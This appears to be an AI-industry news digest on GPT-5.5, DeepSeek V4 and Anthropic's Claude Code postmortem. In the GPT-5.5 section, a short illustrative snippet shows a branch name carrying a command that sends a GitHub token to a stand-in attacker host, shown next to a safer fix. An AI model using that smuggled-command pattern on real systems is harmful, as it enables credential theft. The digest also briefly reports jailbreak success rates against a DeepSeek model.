The frontier splits three ways: pricier, cheaper, and sorrier
OpenAI doubles prices and locks Codex in, DeepSeek undercuts on cost with caveats, and Anthropic ships a postmortem trying to rebuild trust.
TL;DR
- GPT-5.5 lands in ChatGPT and Codex only at twice GPT-5.4’s token price, with no API and an 86% hallucination rate on unknowns.
- DeepSeek V4 ships MIT-licensed MoE models with 1M context, hitting 91% on SWE-bench Verified at roughly one-sixth Claude Opus 4.7’s cost.
- Anthropic blames two months of Claude Code regressions on three harness bugs — but Veracode’s outside tests still flag Opus 4.7.
- Alibaba’s Qwen3.6-27B dense model claims to beat its own 397B MoE flagship on coding while shrinking to a 16.8GB local quant.
- Browser-side AI keeps gaining ground: in-browser PDF extraction, Transformers.js Chrome extensions, and a single-PC Bluesky feed serving 72,000 users for $30/month.
Today the frontier labs are pitching three incompatible stories about what a top-tier model is supposed to be. OpenAI doubles GPT-5.5’s token price, withholds the API, and openly blesses the Codex subscription backdoor that Anthropic just banned — premium pricing and developer lock-in as a deliberate moat. DeepSeek answers from the other direction with V4: MIT-licensed, 1M-token context, SWE-bench numbers within shouting distance of Claude Opus 4.7 at roughly one-sixth the cost, paired with hallucination rates and provenance questions that nobody has answered. And Anthropic spends the day in apology mode, shipping a public postmortem that pins two months of Claude Code regressions on three harness bugs rather than the weights — a story that holds up internally but doesn’t fully survive Veracode’s outside tests.
Underneath the headline launches, the round-ups point at the other half of the story: a 27B Qwen dense model running on a Mac, PDF extraction moving into the browser, and a 72,000-user social feed served from one gaming PC.
GPT-5.5 ships at double the price with a Codex-shaped escape hatch
Source: simon-willison · published 2026-04-23
TL;DR
- GPT-5.5 launches in ChatGPT and Codex only — no API yet — at twice GPT-5.4’s token price.
- It tops Artificial Analysis’s Omniscience leaderboard at 57% while hallucinating on 86% of unknowns, more than double Claude Opus 4.7’s rate [1].
- OpenAI is openly blessing the Codex subscription “backdoor” Anthropic just banned, turning permissiveness into a developer-loyalty weapon [2][3].
- That same backend was recently patched for a command-injection bug that exfiltrated user tokens [4] — third-party plugins now inherit the blast radius.
A capability bump with a jagged ceiling
The headline number from Artificial Analysis is unambiguous: GPT-5.5 at xhigh reasoning takes the AA Omniscience crown at 57%, ahead of Claude Opus 4.7 and Gemini 3.1 Pro [1]. The headline caveat is just as unambiguous: when it doesn’t know, it confabulates 86% of the time, versus 36% for Opus 4.7 and 50% for Gemini 3.1 Pro [1]. Ethan Mollick’s “jagged frontier” line that Willison quotes lands harder with that context — independent reviewers report 5.5 can compress a decade of raw research into a publishable paper in four prompts, yet produces “flat” and “uncanny” long-form fiction with repetitive archetypes [5]. The ceiling moved. The failure modes didn’t.
Simon Willison’s pelican benchmark tells the same story in miniature: the default response was “mangled,” but cranking reasoning_effort to xhigh burned 9,322 reasoning tokens (vs. 39 at default) over four minutes to produce something gradient-rich and nearly anatomically correct. The capability is real; you have to pay reasoning tokens to unlock it.
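To make the knob concrete, here is what that comparison might look like through Willison’s `llm` Python library. The model ID and the exact option name are assumptions based on the post, not a confirmed API; run `llm models` to see what a given plugin actually registers.

```python
# Sketch of reproducing the reasoning-effort comparison with the `llm`
# Python library (https://llm.datasette.io/). Model ID and option name
# are assumptions, not a confirmed API surface.
import llm

model = llm.get_model("gpt-5.5")  # hypothetical model ID

# Default effort: 39 reasoning tokens and, per Willison, "mangled" output.
low = model.prompt("Generate an SVG of a pelican riding a bicycle")

# xhigh effort: ~9,322 reasoning tokens and ~4 minutes in Willison's run.
high = model.prompt(
    "Generate an SVG of a pelican riding a bicycle",
    reasoning_effort="xhigh",
)
print(high.text())
```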
Twice the sticker, roughly a 20% hike on the real bill
API pricing is the second-loudest part of the launch. Once it ships, GPT-5.5 will run $5/$30 per million input/output tokens — exactly double GPT-5.4 — with Pro at $30/$180.
| Model | Input ($/1M) | Output ($/1M) |
|---|---|---|
| GPT-5.4 | 2.50 | 15.00 |
| GPT-5.5 | 5.00 | 30.00 |
| GPT-5.5 Pro | 30.00 | 180.00 |
The community pushback is sharper than “double is too much.” Developer threads converge on roughly 40% fewer output tokens per task, putting the effective cost increase closer to 20% for output-heavy workloads [6]. That’s still a real hike, and downstream tools are reportedly attaching ~7.5× request multipliers for 5.5 access [6] — so the per-task math depends entirely on whether your harness charges per token or per call.
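A quick back-of-envelope using the list prices above and the community’s 40% output-reduction figure; the token mix below is a hypothetical task, not a measurement, and input-heavy mixes land well above 20%:

```python
# Checking the "double sticker, ~20% real hike" claim [6] with list prices.
old_in, old_out = 2.50, 15.00   # GPT-5.4, $/1M tokens
new_in, new_out = 5.00, 30.00   # GPT-5.5, $/1M tokens

# Hypothetical output-heavy task: 2k input tokens, 10k output tokens on 5.4.
in_tok, out_tok = 2_000, 10_000
cost_54 = in_tok / 1e6 * old_in + out_tok / 1e6 * old_out

# Same task on 5.5, assuming 40% fewer output tokens for equivalent work.
cost_55 = in_tok / 1e6 * new_in + out_tok * 0.6 / 1e6 * new_out

print(f"GPT-5.4: ${cost_54:.4f}  GPT-5.5: ${cost_55:.4f}  "
      f"hike: {cost_55 / cost_54 - 1:+.0%}")
# -> about +23% for this output-heavy mix; pure output lands at +20%,
#    while input-dominated tasks climb toward the full +100%.
```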
The harness war OpenAI is winning by being permissive
Willison frames the /backend-api/codex/responses endpoint as a “semi-official backdoor,” but the backstory is a strategic decision. In February, Anthropic amended its Consumer Terms to explicitly forbid Free/Pro/Max OAuth tokens in any client outside the official Claude apps and Claude Code CLI, killing the subscription-arbitrage model that made OpenCode-style harnesses viable [2]. OpenAI hired OpenClaw creator Peter Steinberger weeks later and committed to spinning the project into an independent OpenAI-backed foundation — analysts called it buying displaced developer loyalty in plain sight [3].
Willison’s new llm-openai-via-codex plugin, reverse-engineered from the open-source Codex repo, is exactly the kind of artifact that strategy is designed to produce: a respected community tool that quietly routes through ChatGPT subscriptions instead of the API.
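A minimal sketch of what routing through such a plugin could look like, assuming it registers models via the standard `llm` plugin mechanics; the model alias here is hypothetical:

```python
# Hedged sketch: route a prompt through the Codex backend via Willison's
# llm-openai-via-codex plugin. The alias is a guess; after
# `llm install llm-openai-via-codex`, `llm models` lists the real IDs.
import llm

model = llm.get_model("openai-via-codex/gpt-5.5")  # hypothetical alias
print(model.prompt("Explain this stack trace: ...").text())
# Billing note: this draws on a ChatGPT subscription, not API credits --
# exactly the arbitrage the endpoint enables.
```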
The “semi-official backdoor” framing understates that this is an attack surface OpenAI only recently patched.
That permissiveness has a security tail. BeyondTrust disclosed a command-injection flaw in the same Codex backend, where a malicious GitHub branch name could execute code in the Codex cloud container and exfiltrate User Access Tokens [4]. Plugins that persist Codex auth on developer laptops inherit that blast radius. The launch is two stories stapled together — a genuine but uneven capability jump [1][5], and a land-grab in the agent-harness war where OpenAI’s openness is simultaneously a competitive weapon [2][3] and a liability [4].
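For readers who want the bug class made concrete, here is the pattern BeyondTrust describes in miniature: an untrusted branch name interpolated into a shell string. This is an illustration of the vulnerability shape, not the actual Codex code.

```python
# The injection class from [4], reduced to its essentials.
import subprocess

branch = "$(curl -s evil.example/steal?t=$GITHUB_TOKEN)"  # attacker-chosen name

# VULNERABLE: shell=True lets the branch name's $(...) actually execute.
# subprocess.run(f"git switch {branch}", shell=True)

# SAFER: an argument vector; metacharacters are never shell-interpreted,
# so a hostile branch name just fails to resolve.
subprocess.run(["git", "switch", branch], check=False)
```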
Further reading
- llm-openai-via-codex 0.1a0 — simon-willison
- Sign of the future: GPT-5.5 — one-useful-thing
DeepSeek V4 lands cheap, long, and politically loaded
Source: simon-willison · published 2026-04-24
TL;DR
- DeepSeek V4 ships two MIT-licensed MoE models with 1M-token context: Pro (1.6T/49B active) and Flash (284B/13B active).
- V4-Pro hits ~91.2% on SWE-bench Verified at roughly one-sixth the cost of Claude Opus 4.7 or GPT-5.5.
- A new Compressed/Heavily-Compressed Attention hybrid cuts KV cache to 10% and FLOPs to 27% of V3.2 at 1M context.
- Independent evals flag 94–96% hallucination rates on AA-Omniscience, plus unresolved questions about training hardware and Claude-distillation allegations.
The price chart is the headline
DeepSeek V4 is the first release of the post-V3 series, and the pricing is the part competitors will have to answer for. Flash lists at $0.14/$0.28 per million input/output tokens — under GPT-5.4 Nano and Gemini 3.1 Flash-Lite. Pro lists at $1.74/$3.48, undercutting Gemini 3.1 Pro and GPT-5.4 by roughly 4× on output. VentureBeat’s independent read puts V4-Pro at ~91.2% on SWE-bench Verified, in the same tier as Claude Opus 4.7 at about one-sixth the cost [7]. Artificial Analysis ranks it second only to Kimi K2.6 among open-weights reasoning models [8].
Where the efficiency actually comes from
The Hugging Face companion post is the technically substantive half of this drop. V4 introduces a hybrid attention scheme — Compressed Sparse Attention (CSA) plus Heavily Compressed Attention (HCA) — with a small uncompressed sliding-window branch retained per layer to preserve local precision [9]. The result, per DeepSeek’s own paper, is that V4-Pro at 1M context runs on 27% of V3.2’s per-token FLOPs and 10% of its KV cache; Flash drops to 10% and 7% respectively. That is the mechanism behind the price chart — not a subsidy, an architecture change aimed squarely at agentic workloads where context windows balloon.
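A rough back-of-envelope shows why those cache ratios dominate 1M-context serving economics. The layer/head dimensions below are placeholders, not DeepSeek’s published config; only the cache ratios (10% for Pro, 7% for Flash) come from the paper [9].

```python
# Why KV-cache compression is the whole ballgame at 1M tokens.
layers, kv_heads, head_dim = 60, 8, 128   # hypothetical GQA-style config
bytes_per = 2                             # fp16/bf16
ctx = 1_000_000

# Dense KV cache: one K and one V tensor per layer, per token.
dense_kv = 2 * layers * kv_heads * head_dim * bytes_per * ctx
print(f"dense KV @1M ctx:        {dense_kv / 2**30:.0f} GiB")  # ~229 GiB

print(f"V4-Pro-style 10% cache:  {dense_kv * 0.10 / 2**30:.0f} GiB")
print(f"V4-Flash-style 7% cache: {dense_kv * 0.07 / 2**30:.0f} GiB")
```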
The calibration problem
External benchmarks complicate the “near-frontier” story in one specific direction. On AA-Omniscience, V4-Pro and V4-Flash hallucinate on 94% and 96% of adversarial knowledge questions; Pro’s overall score of -10 means it generates more wrong answers than right ones, versus Claude 4.1 Opus at +4.8 [8]. Raw recall on SimpleQA is actually ahead of GPT-5.4 — the model knows things; it just refuses to refuse. For 1M-context agent deployments where one confident fabrication can poison a tool call, that is the wrong failure mode.
> “The negative score still reflects a model that generates more incorrect than correct answers on adversarial knowledge tasks.” [8]
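For intuition on how a strong-recall model lands at -10, here is an illustrative penalty-style scoring function. The weights are a guess at the shape of AA’s metric, not its published formula.

```python
# Illustrative knowledge score: correct answers earn credit, wrong answers
# cost credit, abstaining ("I don't know") is free. Not AA's exact formula.
def knowledge_score(correct: int, wrong: int, abstained: int) -> float:
    total = correct + wrong + abstained
    return 100 * (correct - wrong) / total

# A model that knows a lot but never abstains can still go negative:
print(knowledge_score(correct=45, wrong=55, abstained=0))   # -10.0
# The same knowledge with calibrated abstention scores positive:
print(knowledge_score(correct=45, wrong=5, abstained=50))   # 40.0
```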
The Huawei and Anthropic overhangs
Willison’s writeup skips the geopolitics; Tom’s Hardware doesn’t. V4 is the first DeepSeek model explicitly optimized for Huawei Ascend 950PR inference, and the paper is conspicuously quiet about what hardware did the pre-training [10]. In the same news cycle, Anthropic alleged DeepSeek ran 16 million Claude queries through 24,000+ fraudulent accounts to distill reasoning and coding behavior [10]. Independent V4-specific safety evaluations aren’t out yet; the closest baseline is Cisco’s R1 red-team, which recorded a 100% jailbreak success rate on HarmBench [11]. Treat that as legacy data, but note that V4’s safety card is thin compared to U.S. labs’.
Local deployment is still a tease
Flash looks laptop-adjacent on paper, but Unsloth’s dynamic quants only shrink it to roughly 157–160GB; per Apidog’s hands-on guide, a 128GB MacBook is viable only with the most aggressive 2-bit dynamic quants, KV cache forced to q8_0, and samplers pinned at min_p=0.05, temp ~0.6, since the 1.58-bit versions otherwise emit “rare token” gibberish [12]. Pro at 865GB isn’t running on any laptop. The open weights are real; the practical home-lab story is “dev-box toy,” not local Claude.
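A sketch of what those pins look like via llama-cpp-python, assuming a hypothetical Unsloth GGUF filename; KV-cache type flags vary by build, so treat this as the shape of the config rather than a copy-paste recipe.

```python
# Apidog's recommended sampler pins [12], sketched with llama-cpp-python.
from llama_cpp import Llama

llm = Llama(
    model_path="DeepSeek-V4-Flash-UD-Q2_K_XL.gguf",  # hypothetical quant file
    n_ctx=32_768,          # start far below 1M on a 128GB machine
    type_k=8, type_v=8,    # GGML_TYPE_Q8_0: q8_0 KV cache, per the guide
)
out = llm(
    "Write a SQL query that ...",
    temperature=0.6,   # pinned per the guide
    min_p=0.05,        # pinned per the guide
    max_tokens=512,
)
print(out["choices"][0]["text"])
```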
What’s actually at stake
Western frontier labs now have an MIT-licensed model within 3–6 months of their best work, priced to make per-token economics indefensible for any application that doesn’t strictly need GPT-5.5-tier reasoning. The counter-argument isn’t capability — it’s calibration, provenance, and safety posture. Whether buyers care enough to pay the premium is the question the next quarter answers.
Further reading
- DeepSeek-V4: a million-token context that agents can actually use — huggingface-blog
Anthropic’s Claude Code postmortem: three harness bugs, one trust problem
Source: simon-willison · published 2026-04-24
TL;DR
- Two months of “Claude got worse” traced to three harness bugs, not weights — one cache-clear fired every turn.
- An April system prompt capping responses at 100 words alone cost ~3% on internal coding evals.
- Anthropic only moved past “skill issue” after an external audit of 6,850+ sessions — second such postmortem in seven months.
- Independent Veracode tests still flag Opus 4.7 — the “harness was broken” framing doesn’t fully survive outside data.
Three bugs, all in the wrapper
Anthropic’s postmortem isolates three compounding changes between March and April, every one of them in the Claude Code harness rather than the model:
| Date | Change | Effect |
|---|---|---|
| Mar 4 | Default reasoning effort silently downgraded from “high” to “medium” to fix a UI freeze | Quieter, shallower responses |
| Mar 26 | Cache-pruning meant to clear stale thinking once after an hour of idle | Bug fired every turn for the rest of the session — Claude looked forgetful and repetitive |
| Apr 16 | System prompt capped inter-tool text at 25 words, final responses at 100 | ~3% drop on internal coding evals; rolled back Apr 20 [13] |
Boris Cherny from the Claude Code team defended the cache change on Hacker News as cost protection for users running 900k-token contexts — except in practice it turned every post-idle turn into a cache miss and raised bills [14]. Simon Willison’s own anecdote captures why this hurt: he keeps eleven idle Claude Code sessions running and estimates he prompts more in stale sessions than fresh ones. The “optimization for resumption” was sabotaging the dominant use case.
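The postmortem’s description implies a classic forgot-to-reset-the-marker bug. Here is a minimal reconstruction of that failure shape; this is illustrative, not Anthropic’s code.

```python
# A prune meant to fire once after an hour of idle, but the idle marker
# never resets, so every subsequent turn prunes and misses the cache.
import time

IDLE_LIMIT = 3600  # one hour

class Session:
    def __init__(self):
        self.last_active = time.time()
        self.cache = {"thinking": "...hundreds of thousands of tokens..."}

    def on_turn(self):
        if time.time() - self.last_active > IDLE_LIMIT:
            self.cache.pop("thinking", None)  # intended: once per idle period
        # BUG: without the line below, the condition stays true for the rest
        # of the session, so every post-idle turn clears the cache again:
        # self.last_active = time.time()
```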
It took an outside audit to be believed
The more uncomfortable story is who actually surfaced this. For weeks, Anthropic told complaining users it was a prompting issue. What broke the dam was AMD senior director Stella Laurenzo publishing a quantitative audit of 6,850+ Claude Code sessions and 234,000 tool calls, documenting a shift from “research-first” to “lazy edit-first” behavior [15]. Top Hacker News responses to the postmortem were vindication mixed with venom — “you weren’t dogfooding?!” — and accusations of weeks of gaslighting [14].
Anthropic explicitly denies ever degrading models to manage capacity or cost [16]. Fine — but every one of these bugs came from a latency or token-saving optimization, which is exactly why the “AI shrinkflation” narrative keeps regenerating regardless of intent.
A pattern, not an incident
This is Anthropic’s second major quality postmortem in roughly seven months. September 2025 blamed TPU compiler bugs, context-window routing errors, and token corruption for a strikingly similar wave of “nerfing” complaints [17]. Two data points isn’t a trend, but the shape is consistent: serving-stack and harness changes silently drift model behavior, internal evals don’t catch it because researchers don’t run the public build, and only external audits force the admission.
The “models are fine, the harness was broken” framing also doesn’t fully survive independent testing. Veracode’s recent analysis found Claude Opus 4.7 introduces security vulnerabilities in 52% of tested coding tasks — nearly double comparable OpenAI models [18]. That’s a quality concern that outlives any harness fix.
Takeaway
If you’re building agentic systems, Willison is right that the postmortem is worth reading in detail — the failure modes are genuinely subtle. But the meta-lesson is grimmer: the dominant source of perceived “model degradation” in 2026 isn’t weights drift, it’s product-layer optimizations layered on top of non-deterministic models, with no eval methodology that reliably catches the regressions before users do. Transparency after the fact is good. A detection story that doesn’t depend on an AMD director auditing a quarter-million tool calls would be better.
Round-ups
Qwen3.6-27B: Flagship-Level Coding in a 27B Dense Model
Source: simon-willison
Alibaba’s Qwen3.6-27B dense model claims to beat its prior 397B-parameter MoE flagship across coding benchmarks while shrinking from 807GB to 55.6GB. Simon Willison ran the 16.8GB Q4_K_M quant locally via llama-server at roughly 25 tokens/second on a Mac.
Speeding up agentic workflows with WebSockets in the Responses API
Source: openai-blog
OpenAI details how it cut Codex agent loop overhead by adding WebSocket transport and connection-scoped caching to the Responses API, reducing per-call latency for long-running agentic workflows that repeatedly hit the same model context.
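The underlying pattern, stripped of OpenAI specifics, is ordinary connection reuse: one handshake amortized across an agent loop. A generic sketch with the Python websockets library follows; the endpoint and message shape are invented for illustration and are not OpenAI’s actual protocol.

```python
# Connection reuse for an agent loop: one WebSocket instead of a fresh
# TCP+TLS handshake per call. Endpoint and payload shape are hypothetical.
import asyncio, json
import websockets

async def agent_loop(steps: list[str]) -> None:
    async with websockets.connect("wss://api.example.com/v1/responses") as ws:
        for step in steps:
            # Connection-scoped caching means the server can skip re-processing
            # the shared context on every call within this session.
            await ws.send(json.dumps({"input": step, "reuse_context": True}))
            print(json.loads(await ws.recv()))

asyncio.run(agent_loop(["plan", "edit", "test"]))
```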
How to Use Transformers.js in a Chrome Extension
Source: huggingface-blog
Hugging Face publishes a walkthrough for embedding Transformers.js inside a Chrome extension, covering the manifest, service worker setup and model loading required to run inference locally in the browser without server calls.
Extract PDF text in your browser with LiteParse for the web
Source: simon-willison
Simon Willison ported LlamaIndex’s LiteParse PDF text extractor to run entirely in-browser on PDF.js and Tesseract.js, vibe-coded in a 59-minute Claude Code session and deployed via GitHub Pages so files never leave the user’s machine.
russellromney/honker
Source: simon-willison
Russell Romney’s honker is a Rust SQLite extension that ports Postgres-style NOTIFY/LISTEN, durable Kafka-like streams, and the transactional outbox pattern to SQLite, adding 20+ custom SQL functions and using 1ms WAL-file stat polling for near-real-time delivery.
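A hypothetical taste of what that surface might look like from Python’s sqlite3: every SQL function name below is a guess at the NOTIFY/LISTEN API the README describes, so check the repo before relying on any of it.

```python
# Hypothetical honker usage sketch; function names are guesses, not the
# extension's documented API.
import sqlite3

db = sqlite3.connect("app.db")
db.enable_load_extension(True)       # requires a build with extension support
db.load_extension("./libhonker")     # path to the compiled extension

db.execute("SELECT notify('orders', 'order:42 created')")    # hypothetical
for (msg,) in db.execute("SELECT * FROM listen('orders')"):  # hypothetical
    print(msg)
```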
Serving the For You feed
Source: simon-willison
Bluesky’s For You feed, used by about 72,000 people, runs from a single Go process on a 16-core, 96GB gaming PC in spacecowboy’s living room, fronted by a $7/month OVH VPS over Tailscale, with total operating cost of $30/month.
It’s a big one
Source: simon-willison
Simon Willison’s weekly newsletter rounds up an unusually heavy week: 5 blog posts, 8 links, 3 quotes, a new chapter of his Agentic Engineering Patterns guide, plus benchmark images including pelicans on bicycles, a possum on an e-scooter and raccoons with ham radios.
Footnotes
1. Artificial Analysis — https://artificialanalysis.ai/articles/openai-gpt5-5-is-the-new-leading-AI-model: “GPT-5.5 (xhigh) achieved a record accuracy of 57% on AA Omniscience… while recording an 86% hallucination rate, compared to Claude Opus 4.7’s 36% and Gemini 3.1 Pro’s 50%.”
2. VentureBeat on Anthropic crackdown — https://venturebeat.com/technology/anthropic-cracks-down-on-unauthorized-claude-usage-by-third-party-harnesses: “Anthropic formalized its stance by updating Consumer Terms to forbid using Free/Pro/Max OAuth tokens in any product other than the official Claude interface or Claude Code CLI — closing the arbitrage loophole OpenCode had exploited.”
3. Forbes on Steinberger hire — https://www.forbes.com/sites/ronschmelzer/2026/02/16/openai-hires-openclaw-creator-peter-steinberger-and-sets-up-foundation/: “OpenAI hired OpenClaw creator Peter Steinberger and committed to spinning the project into an independent OpenAI-backed foundation — a move analysts read as buying developer loyalty after Anthropic’s blocks.”
4. BeyondTrust security research — https://www.beyondtrust.com/blog/entry/openai-codex-command-injection-vulnerability-github-token: “A command injection vulnerability in the Codex backend allowed attackers to smuggle bash commands through the GitHub branch parameter and exfiltrate User Access Tokens from the Codex cloud container.”
5. Xuepilot blog on Mollick review — https://blog.xuepilot.com/when-ai-can-write-phd-papers-but-cant-write-good-fiction: “GPT-5.5 could turn a decade of raw research data into a high-quality academic paper in four prompts, yet long-form fiction remained ‘flat,’ ‘uncanny,’ and riddled with repetitive archetypes.”
6. r/vibecoding thread on pricing — https://www.reddit.com/r/vibecoding/comments/1suvvfk/gpt55_is_here_the_price_doubled_but_40_fewer/: “GPT-5.5 is here — the price doubled but [uses] 40% fewer [output tokens]; effective net hike closer to 20% for most workloads.”
7. VentureBeat: “DeepSeek V4 arrives with near-state-of-the-art intelligence at 1/6th the cost of Opus 4.7 / GPT-5.5; V4-Pro reached approximately 91.2% on SWE-bench Verified, placing it in the same tier as Claude Opus 4.7.”
8. Artificial Analysis — https://artificialanalysis.ai/articles/deepseek-is-back-among-the-leading-open-weights-models-with-v4-pro-and-v4-flash: “DeepSeek V4 Pro and Flash exhibit hallucination rates of 94% and 96% respectively on the AA-Omniscience benchmark; while V4 Pro improved 11 points over V3.2 to a score of -10, the negative score still reflects a model that generates more incorrect than correct answers on adversarial knowledge tasks.”
9. Hugging Face blog (DeepSeek V4) — https://huggingface.co/blog/deepseekv4: “Hybrid Attention combining Compressed Sparse Attention (CSA) and Heavily Compressed Attention (HCA) cuts KV cache to 10% and FLOPs to 27% of V3.2 at 1M-token context, but a small uncompressed sliding-window branch is retained per layer to preserve fine-grained local dependencies.”
10. Tom’s Hardware: “DeepSeek launches 1.6 trillion parameter V4 on Huawei chips as US escalates AI theft accusations — Anthropic alleged DeepSeek used over 24,000 fraudulent accounts to run 16 million queries against Claude to extract reasoning and coding capabilities.”
11. Cisco Security blog (legacy R1 evaluation) — https://blogs.cisco.com/security/evaluating-security-risk-in-deepseek-and-other-frontier-reasoning-models: “DeepSeek-R1 failed to block a single harmful prompt across the HarmBench dataset — a 100% attack success rate — making it roughly 11 times more likely to be exploited by cybercriminals than GPT-4o or Gemini; V4’s safety documentation remains limited compared to U.S. labs’ detailed safety cards.”
12. Apidog deployment guide — https://apidog.com/blog/how-to-run-deepseek-v4-locally/: “Unsloth’s dynamic quantization shrinks V4-Flash to roughly 157–160GB, making 128GB M-series MacBooks viable only with aggressive 2-bit quants; users must set min_p=0.05 and temperature ~0.6 or 1.58-bit versions produce ‘rare token’ incoherence.”
13. Anthropic’s Claude Code postmortem: “An April 16 system prompt instruction told the model to ‘keep text between tool calls to ≤25 words’ and final responses to ≤100 words — a verbosity cap that produced a measurable ~3% drop in coding evaluations before being rolled back on April 20.”
14. findskill.ai summary of HN thread 47878905 — https://findskill.ai/blog/claude-code-nerfed-postmortem-explained/: “Top HN commenters reacted with ‘you weren’t dogfooding?!’ and accused Anthropic of gaslighting users for weeks; Boris Cherny from the Claude Code team replied that the cache-clearing change was meant to protect users from runaway costs in 900k+ token contexts.”
15. Medium — ‘Anthropic Admitted Claude Code Broke: We Were Right’ — https://medium.com/vibe-coding/anthropic-admitted-claude-code-broke-we-were-right-e3f3a6c60a31: “AMD senior director Stella Laurenzo published an audit of 6,850+ Claude Code sessions and 234,000 tool calls showing a sharp shift from ‘research-first’ to ‘lazy edit-first’ behavior — external evidence that forced Anthropic past its initial ‘skill issue’ dismissals.”
16. Business Insider — https://www.businessinsider.com/anthropic-admits-claude-code-issues-user-complaints-denies-nerfing-degrading-2026-4: “Anthropic explicitly denies that it ever degrades models for capacity or cost-management reasons, framing the regressions as unintended consequences of latency optimizations rather than ‘nerfing.’”
17. Tessl blog — https://tessl.io/blog/anthropic-postmortem-shows-how-small-changes-compounded-into-claude-code-failure/: “This is Anthropic’s second major quality postmortem in seven months — September 2025 blamed TPU compiler bugs and context-routing errors for similar ‘nerfing’ complaints, suggesting a recurring pattern where serving-stack changes silently degrade model behavior.”
18. Forbes / Veracode analysis — https://www.forbes.com/sites/the-wiretap/2026/04/22/anthropics-claude-is-pumping-out-vulnerable-code-cyber-experts-warn/: “Veracode found Claude Opus 4.7 introduced security vulnerabilities in 52% of tested coding tasks — nearly double the rate of comparable OpenAI models — raising questions about quality even after the harness fixes.”